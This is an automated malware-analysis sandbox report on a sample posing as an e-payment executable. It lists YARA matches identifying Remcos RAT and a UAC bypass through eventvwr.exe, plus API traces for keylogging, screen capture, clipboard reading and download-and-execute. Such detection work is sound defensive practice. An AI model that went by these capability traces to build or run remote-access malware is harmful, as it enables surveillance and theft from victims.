            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_004050FC OpenClipboard,GetClipboardData,CloseClipboard,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,13_2_004050FC
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040D71E CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,StretchBlt,GetObjectA,LocalAlloc,GlobalAlloc,GetDIBits,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,DeleteObject,GlobalFree,DeleteDC,DeleteDC,DeleteDC,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,13_2_0040D71E
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_004038DB GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,13_2_004038DB

            E-Banking Fraud

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1424435810.00000000025D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3845599217.0000000003010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: e-Payment.NET.CMS4006975815.exe PID: 7552, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: e-Payment.NET.CMS4006975815.exe PID: 7948, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JXHPwNYzysUjKo.exe PID: 8008, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JXHPwNYzysUjKo.exe PID: 7240, type: MEMORYSTR

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
            Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: e-Payment.NET.CMS4006975815.exe
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c13_2_0040A71E
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeCode function: 0_2_0065D5BC0_2_0065D5BC
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeCode function: 0_2_023C6C840_2_023C6C84
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeCode function: 0_2_023C02A00_2_023C02A0
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeCode function: 0_2_023C02900_2_023C0290
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeCode function: 0_2_023C10880_2_023C1088
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeCode function: 0_2_023C06D80_2_023C06D8
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 9_2_0280D5BC9_2_0280D5BC
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 9_2_048A5F309_2_048A5F30
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 9_2_048A06D89_2_048A06D8
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 9_2_048A27C89_2_048A27C8
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 9_2_048A10889_2_048A1088
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 9_2_048A02909_2_048A0290
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 9_2_048A02A09_2_048A02A0
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: String function: 0040FC1A appears 54 times
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: String function: 0040FCBA appears 34 times
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000000.1364244402.00000000000FE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWkSX.exe6 vs e-Payment.NET.CMS4006975815.exe
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1411266191.00000000038AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs e-Payment.NET.CMS4006975815.exe
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1409996431.00000000026D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs e-Payment.NET.CMS4006975815.exe
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1412551435.0000000004E30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs e-Payment.NET.CMS4006975815.exe
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1413578810.0000000005770000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs e-Payment.NET.CMS4006975815.exe
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1407937775.000000000066E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs e-Payment.NET.CMS4006975815.exe
            Source: e-Payment.NET.CMS4006975815.exeBinary or memory string: OriginalFilenameWkSX.exe6 vs e-Payment.NET.CMS4006975815.exe
            Source: e-Payment.NET.CMS4006975815.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
